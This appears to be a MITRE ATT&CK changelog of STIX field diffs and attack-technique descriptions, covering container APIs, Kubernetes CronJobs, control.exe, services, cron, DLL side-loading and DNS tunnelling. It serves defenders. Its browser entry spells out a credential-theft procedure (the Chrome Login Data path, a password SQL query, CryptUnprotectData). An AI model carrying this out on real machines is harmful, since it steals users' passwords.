| Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API) An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. |
New Mitigations:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:20:31.636000+00:00 | 2022-04-01 13:11:10.849000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access |
| Description |
|---|
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:01:10.545000+00:00 | 2022-04-01 13:16:14.786000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-27 17:38:17.146000+00:00 | 2022-04-01 13:06:58.794000+00:00 |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | File: File Creation |
| x_mitre_data_sources[2] | File: File Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 18:37:11.672000+00:00 | 2022-03-11 19:01:55.821000+00:00 |
| x_mitre_version | 1.1 | 2.0 |
| x_mitre_data_sources[1] | File: File Creation | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Old Description | New Description |
|---|---|
| Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-03 20:11:52.175000+00:00 | 2022-04-20 16:52:58.415000+00:00 |
| description | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) |
| external_references[1]['source_name'] | TechNet Services | AppleDocs Launch Agent Daemons |
| external_references[1]['description'] | Microsoft. (n.d.). Services. Retrieved June 7, 2016. | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/cc772408.aspx | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html |
| external_references[2]['source_name'] | AppleDocs Launch Agent Daemons | TechNet Services |
| external_references[2]['description'] | Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. | Microsoft. (n.d.). Services. Retrieved June 7, 2016. |
| external_references[2]['url'] | https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html | https://technet.microsoft.com/en-us/library/cc772408.aspx |
| x_mitre_data_sources[0] | Service: Service Creation | Process: Process Creation |
| x_mitre_data_sources[1] | Service: Service Modification | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Process: OS API Execution | File: File Modification |
| x_mitre_data_sources[4] | Command: Command Execution | Driver: Driver Load |
| x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Creation | Process: OS API Execution |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Modification | File: File Creation |
| x_mitre_data_sources[7] | File: File Creation | Service: Service Modification |
| x_mitre_data_sources[8] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation |
| Description |
|---|
| Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 17:58:03.788000+00:00 | 2022-04-01 18:25:13.952000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Process: Process Access |
| x_mitre_data_sources[1] | File: File Access | Process: OS API Execution |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Access |
| x_mitre_data_sources[3] | Process: OS API Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Process: Process Access | Command: Command Execution |
| Old Description | New Description |
|---|---|
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:03:47.293000+00:00 | 2022-02-15 19:29:57.405000+00:00 |
| description | Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. |
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-23 15:29:36.918000+00:00 | 2022-03-24 17:33:03.443000+00:00 |
| description | Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. |
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Scheduled Job: Scheduled Job Creation |
| Description |
|---|
| Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020. | |
| external_references | CAPEC-641 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-641 | |
| external_references | Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 18:31:34.954000+00:00 | 2022-05-05 04:07:48.912000+00:00 |
| external_references[1]['source_name'] | capec | FireEye DLL Side-Loading |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/641.html | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf |
| external_references[2]['source_name'] | FireEye DLL Side-Loading | capec |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf | https://capec.mitre.org/data/definitions/641.html |
| x_mitre_data_sources[0] | File: File Creation | File: File Modification |
| x_mitre_data_sources[1] | File: File Modification | File: File Creation |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| Description |
|---|
| Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 16:26:34.196000+00:00 | 2022-06-17 13:52:03.232000+00:00 |
| external_references[1]['source_name'] | PAN DNS Tunneling | Medium DnsTunneling |
| external_references[1]['description'] | Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020. | Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020. |
| external_references[1]['url'] | https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling | https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000 |
| external_references[2]['source_name'] | Medium DnsTunneling | University of Birmingham C2 |
| external_references[2]['description'] | Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. |
| external_references[2]['url'] | https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000 | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf |
| external_references[3]['source_name'] | University of Birmingham C2 | PAN DNS Tunneling |
| external_references[3]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020. |
| external_references[3]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Chris Heald |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records) Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:29:18.740000+00:00 | 2022-10-21 14:32:48.393000+00:00 |
| description | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records) Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
| external_references[1]['source_name'] | DNS Dumpster | Circl Passive DNS |
| external_references[1]['description'] | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. |
| external_references[1]['url'] | https://dnsdumpster.com/ | https://www.circl.lu/services/passive-dns/ |
| external_references[2]['source_name'] | Circl Passive DNS | DNS Dumpster |
| external_references[2]['description'] | CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020. | Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://www.circl.lu/services/passive-dns/ | https://dnsdumpster.com/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sean Metcalf Twitter DNS Records', 'description': 'Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.', 'url': 'https://twitter.com/PyroTek3/status/1126487227712921600/photo/1'} |
| Old Description | New Description |
|---|---|
